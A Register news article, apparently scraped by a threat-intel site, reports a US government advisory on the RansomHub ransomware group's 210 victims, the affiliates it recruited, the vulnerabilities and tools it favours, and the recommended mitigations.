Threat Intel Solutions

#### [Cyber-crime](/security/cyber_crime/)RansomHub hits 210 victims in just 6 months===========================================The ransomware gang recruits high-profile affiliates from LockBit and ALPHV—————————————————————————[Connor Jones](/Author/Connor-Jones ‘Read more by this author’) Fri 30 Aug 2024 // 23:55 UTC [](https://www.reddit.com/submit?url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dreddit&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months) [](https://twitter.com/intent/tweet?text=RansomHub%20hits%20210%20victims%20in%20just%206%20months&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dtwitter&via=theregister) [](https://www.facebook.com/dialog/feed?app_id=1404095453459035&display=popup&link=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dfacebook) [](https://www.linkedin.com/shareArticle?mini=true&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dlinkedin&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months&summary=The%20ransomware%20gang%20recruits%20high-profile%20affiliates%20from%20LockBit%20and%20ALPHV) [](https://api.whatsapp.com/send?text=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dwhatsapp) As RansomHub continues to scoop up top talent from the fallen LockBit and ALPHV operations while accruing a smorgasbord of victims, security and law enforcement agencies in the US feel it’s time to issue an official warning about the group that’s gunning for ransomware supremacy.According to the security advisory from CISA, the FBI, the HHS, and the MS-ISAC, RansomHub amassed at least 210 victims since spinning up in February this year.That’s a strong innings by anyone’s estimations, let alone a group relatively fresh off the blocks and staffed by a ragtag ensemble of affiliates poached from former leading ransomware operations. Looking at the sprawling list of sectors the group has successfully targeted, it seems affiliates will go after anyone, including critical infrastructure and emergency services.  The purpose of this advisory is to disseminate known tactics, techniques, and procedures (TTPs) to inform defenders who can then create detection rules and stop RansomHub attacks before they unfold.As for how the affiliates tend to break in, they love a good vulnerability exploit. Most of the vulnerabilities the advisory noted as firm favorites for the gang were only a year old. However, bugs such as CVE-2017-0144, the one that underpinned [the NSA’s EternalBlue exploit](https://www.theregister.com/2017/04/14/latest_shadow_brokers_data_dump/), and 2020’s [ZeroLogon](https://www.theregister.com/2020/09/24/microsoft_zerologon_in_wild/) have also been used with some success. While monitoring network logs, defenders should keep an eye out for the usual suspects: Mimikatz for credential harvesting, and Cobalt Strike and Metasploit for moving around the network, establishing C2 infrastructure, and data exfiltration.Other [tools are used](https://www.theregister.com/2024/08/19/ransomhub_edrkilling_malware/), such as PuTTY and AWS S3 buckets for data exfil, but the advisory has the full list, and these tools and techniques differ substantially depending on the affiliate running the attack, so checking them all out is always going to be a good idea.A number of mitigations were also included in the advisory. Put simply, many if not all could be placed under the umbrella category of ‘the basics,’ such as keeping systems and software up to date, segmenting networks, and enforcing strong password policies, yada yada you know the drill.And of course, CISA is involved, so it obviously wouldn’t miss a chance to plug its latest [Secure By Design initiative](https://www.theregister.com/2024/05/09/68_tech_firms_sign_cisas/). It said insecure software is the root cause of many issues the recommended mitigations aimed to, well, mitigate, so ensuring security is embedded into product architecture and [mandating MFA](https://www.theregister.com/2024/07/10/snowflake_mandatory_mfa/) — ideally the phishing-resistant kind — for privileged users is imperative.’CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics,’ the [advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a) reads.’By using secure by design tactics, software manufacturers can make their product lines secure ‘out of the box’ without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.’### Stiff competitionGiven that it took four years to finally cripple LockBit, it seems RansomHub may have a disturbingly long run ahead.Since spinning up in February as a [suspected Knight rebrand](https://www.theregister.com/2024/06/05/ransomhub_knight_reboot/), it’s routinely hovering around the top spots in the monthly tables that track the number of victims claimed by ransomware operations.It’s also now the go-to choice of ransomware for sophisticated groups such as [Scattered Spider](https://www.theregister.com/2024/07/16/scattered_spider_ransom/), perhaps offering an insight into how highly regarded it is among cybercriminal elites.Just eight months ago, RansomHub didn’t exist and LockBit and ALPHV had a firm stranglehold on the ransomware market. Sure, there were serious competitors, but none operated on the same scale as the two former juggernauts.Now, one is [hanging on by a thread](https://www.theregister.com/2024/07/31/five_months_after_lockbit/) and [the other is no more](https://www.theregister.com/2024/02/19/infosec_news_in_brief/). But here we have RansomHub vying to take that crown and cement itself as the new LockBit or ALPHV, using their old cronies to do it.The competition, however, is much fiercer now than it was just a few months ago. The likes of [INC](https://www.theregister.com/2024/03/28/nhs_scotland_cyberattack/), [Play](https://www.theregister.com/2024/03/08/swiss_government_files_ransomware/), [Akira](https://www.theregister.com/2024/02/06/akira_and_8base_new_ransomware_research/), [Qilin](https://www.theregister.com/2024/07/05/qilin_impacts_patient/), and others are all looking to claim the top spot as their own and all of them are posting similar numbers.There is, though, one group that should also not be discounted and one that was recently singled out for being far more active than its data leak site suggests it is.Cisco Talos researchers published a [report on BlackByte](https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/) this week, discovering that only around 20-30 percent of the true number of victims are posted to its leak site. The reason is undetermined.According to the experts, BlackByte is believed to be an offshoot of Conti, which during its heyday surpassed the success of LockBit and ALPHV.That said, despite it supposedly being headed up by cybercrime veterans, even taking into account the victims it doesn’t publicize, they’re nowhere near as active as Conti once was, posting just 41 victims throughout the entirety of 2023 and just three this year. ® [Sponsored: Data survival or commercial disaster?](https://go.theregister.com/tl/3056/shttps://www.theregister.com/2024/08/12/data_survival_or_commercial_disaster/) Share [](https://www.reddit.com/submit?url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dreddit&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months) [](https://twitter.com/intent/tweet?text=RansomHub%20hits%20210%20victims%20in%20just%206%20months&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dtwitter&via=theregister) [](https://www.facebook.com/dialog/feed?app_id=1404095453459035&display=popup&link=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dfacebook) [](https://www.linkedin.com/shareArticle?mini=true&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dlinkedin&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months&summary=The%20ransomware%20gang%20recruits%20high-profile%20affiliates%20from%20LockBit%20and%20ALPHV) [](https://api.whatsapp.com/send?text=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dwhatsapp) #### More about* [Cybercrime](/Tag/Cybercrime/)* [Cybersecurity](/Tag/Cybersecurity/)* [Cybersecurity and Infrastructure Security Agency](/Tag/Cybersecurity%20and%20Infrastructure%20Security%20Agency/) More like these × ### More about* [Cybercrime](/Tag/Cybercrime/)* [Cybersecurity](/Tag/Cybersecurity/)* [Cybersecurity and Infrastructure Security Agency](/Tag/Cybersecurity%20and%20Infrastructure%20Security%20Agency/)* [Ransomware](/Tag/Ransomware/) ### Narrower topics* [NCSC](/Tag/NCSC/)* [REvil](/Tag/REvil/)* [RSA Conference](/Tag/RSA%20Conference/)* [Wannacry](/Tag/Wannacry/)* [Zero trust](/Tag/Zero%20trust/) ### Broader topics* [Federal government of the United States](/Tag/Federal%20government%20of%20the%20United%20States/)* [Security](/Tag/Security/) #### More aboutShare [](https://www.reddit.com/submit?url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dreddit&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months) [](https://twitter.com/intent/tweet?text=RansomHub%20hits%20210%20victims%20in%20just%206%20months&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dtwitter&via=theregister) [](https://www.facebook.com/dialog/feed?app_id=1404095453459035&display=popup&link=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dfacebook) [](https://www.linkedin.com/shareArticle?mini=true&url=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dlinkedin&title=RansomHub%20hits%20210%20victims%20in%20just%206%20months&summary=The%20ransomware%20gang%20recruits%20high-profile%20affiliates%20from%20LockBit%20and%20ALPHV) [](https://api.whatsapp.com/send?text=https://www.theregister.com/2024/08/30/ransomhub/%3futm_medium%3dshare%26utm_content%3darticle%26utm_source%3dwhatsapp) POST A COMMENT #### More about* [Cybercrime](/Tag/Cybercrime/)* [Cybersecurity](/Tag/Cybersecurity/)* [Cybersecurity and Infrastructure Security Agency](/Tag/Cybersecurity%20and%20Infrastructure%20Security%20Agency/) More like these × ### More about* [Cybercrime](/Tag/Cybercrime/)* [Cybersecurity](/Tag/Cybersecurity/)* [Cybersecurity and Infrastructure Security Agency](/Tag/Cybersecurity%20and%20Infrastructure%20Security%20Agency/)* [Ransomware](/Tag/Ransomware/) ### Narrower topics* [NCSC](/Tag/NCSC/)* [REvil](/Tag/REvil/)* [RSA Conference](/Tag/RSA%20Conference/)* [Wannacry](/Tag/Wannacry/)* [Zero trust](/Tag/Zero%20trust/) ### Broader topics* [Federal government of the United States](/Tag/Federal%20government%20of%20the%20United%20States/)* [Security](/Tag/Security/) #### TIP US OFF[Send us news](https://www.theregister.com/Profile/contact/)[#### Ransomware batters critical industries, but takedowns hint at reliefWhether attack slowdown continues downward trend is the million dollar question that security researchers can’t answerCyber-crime9 days -| 1](/2024/08/22/critical_industrial_ransomware/?td=keepreading) [#### Brain Cipher claims attack on Olympic venue, promises 300 GB data leakFrench police reckon financial system targeted during Summer GamesCyber-crime2 days -| 4](/2024/08/29/brain_cipher_olympic_attack/?td=keepreading) [#### Feds bust minor league Radar/Dispossessor ransomware gangThe takedown may be small but any ransomware gang sent to the shops is good news in our bookCyber-crime18 days -| 4](/2024/08/13/feds_bust_minor_league_radardispossessor/?td=keepreading) [#### The start of the great virtualization migration?How consolidating disparate cloud components with Nutanix can bring multiple benefitsSponsored Feature](/2024/08/26/the_start_of_the_great/?td=keepreading) [#### Six ransomware gangs behind over 50% of 2024 attacksPlus many more newbies waiting in the wingsCyber-crime18 days -|](/2024/08/13/lockbit_ransomware_stats/?td=keepreading) [#### RansomHub-linked EDR-killing malware spotted in the wildInfosec in brief Also: Your external-facing NetSuite sites need a review; five popular malware varieties for Q2, and moreSecurity12 days -| 1](/2024/08/19/ransomhub_edrkilling_malware/?td=keepreading) [#### US accuses man of being ‘elite’ ransomware pioneer they’ve hunted for yearsAuthorities allege ‘J.P. Morgan’ practiced ‘extreme operational and online security’Cyber-crime18 days -| 7](/2024/08/13/j_p_morgan_suspect_indicted_charged/?td=keepreading) [#### Alleged Karakut ransomware scumbag charged in USInfosec in brief Plus: Microsoft issues workaround for dual-boot crashes; ARRL cops to ransom payment, and moreSecurity5 days -| 2](/2024/08/26/karakut_ransomware_scum_charged/?td=keepreading) [#### Enzo Biochem ordered to cough up $4.5 million over lousy security that led to ransomware disasterThree state attorneys general probed the company and found plenty to chastiseCyber-crime17 days -| 3](/2024/08/14/enzo_biochem_ransomware_fine/?td=keepreading) [#### 110K domains targeted in ‘sophisticated’ AWS cloud extortion campaignUpdated If you needed yet another reminder of what happens when security basics go awryResearch10 days -| 4](/2024/08/21/aws_extortion_campaign/?td=keepreading) [#### Iran’s Pioneer Kitten hits US networks via buggy Check Point, Palo Alto gearThe government-backed crew also enjoys ransomware as a side hustleCyber-crime3 days -| 5](/2024/08/28/iran_pioneer_kitten/?td=keepreading) [#### US sues Georgia Tech over alleged cybersecurity failings as a Pentagon contractorRap sheet spells out major no-nos after disgruntled staff blow whistleSecurity8 days -| 22](/2024/08/23/us_georgia_tech_lawsuit/?td=keepreading)

Related Tags:
Lemon Sandstorm

Storm-0875

Octo Tempest

GOLD SAHARA

Akira

PUNK SPIDER

NAICS: 923 – Administration Of Human Resource Programs

NAICS: 518 – Computing Infrastructure Providers

Data Processing

Web Hosting

Related Services

NAICS: 92 – Public Administration

Associated Indicators: